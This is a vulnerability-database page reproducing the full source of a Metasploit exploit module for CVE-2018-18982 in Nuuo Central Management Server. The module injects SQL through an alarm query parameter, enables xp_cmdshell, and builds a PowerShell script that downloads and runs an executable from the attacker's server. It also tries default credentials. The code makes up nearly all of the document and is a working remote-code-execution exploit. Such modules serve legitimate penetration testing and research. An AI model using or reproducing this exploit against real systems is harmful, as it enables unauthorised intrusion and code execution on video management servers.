Nuuo Central Management Authenticated SQL Server SQLi

2019-01-2110:14:41

Pedro Ribeiro <[email protected]>

www.rapid7.com

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.109

Percentile

95.2%

JSON

The Nuuo Central Management Server allows an authenticated user to query the state of the alarms. This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is installed by default, xp_cmdshell can be enabled and abused to achieve code execution. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Nuuo
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'            => 'Nuuo Central Management Authenticated SQL Server SQLi',
      'Description'     => %q{
      The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
      This module will either use a provided session number (which can be guessed with an auxiliary
      module) or attempt to login using a provided username and password - it will also try the
      default credentials if nothing is provided.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pedro Ribeiro <[email protected]>'  # Vulnerability discovery and Metasploit module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-18982' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]

        ],
      'Platform'        => 'win',
      'Arch'            => ARCH_X86,
      'Stance'          => Msf::Exploit::Stance::Aggressive,  # we need this to run in the foreground
      'Targets'         =>
        [
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
        ],
      'Notes'           =>
        {
          'SideEffects'   => [ ARTIFACTS_ON_DISK ]
        },
      'Privileged'      => false,  # we run as NETWORK_SERVICE
      'DisclosureDate'  => '2018-10-11',
      'DefaultTarget'   => 0))
    register_options [
      Opt::RPORT(5180),
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
    ]
  end


  def inject_sql(sql)
    res = ncs_send_request({
      'method' => 'GETOPENALARM',
      'user_session' => user_session,
      'device_id' => "#{rand_text_numeric(4)}",
      'source_server' => "';#{sql};-- ",
      'last_one' => "#{rand_text_numeric(4)}"
    })
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    unless @pl
      print_error("A request came in, but the payload wasn't ready yet!")
      return
    end
    print_good('Sending the payload to CMS...')
    send_response(cli, @pl)

    Rex.sleep(3)

    print_status('Executing shell...')
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))
    register_file_for_cleanup("c:/windows/temp/#{@filename}")
  end

  def create_hex_cmd(cmd)
    var = rand_text_alpha(2)
    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
    cmd.each_byte { |b|
      hex_cmd << b.to_i.to_s(16)
    }
    hex_cmd << "; exec (@#{var})"
  end

  def primer
    # we need to roll our own here instead of using the MSSQL mixins
    # (tried that and it doesn't work)
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
    download_pl = %{xp_cmdshell }
    download_pl << %{'cd C:\\windows\\temp\\ && }
    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}

    print_status('Injecting PowerShell payload')
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
    register_file_for_cleanup("c:/windows/temp/#{ps1}")
  end

  def exploit
    connect
    ncs_login
    fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session

    @pl = generate_payload_exe

    #do not use SSL
    ssl = datastore['SSL']
    datastore['SSL'] = false

    begin
      Timeout.timeout(datastore['HTTPDELAY']) {super}
    rescue Timeout::Error
      datastore['SSL'] = ssl
    end
  end
end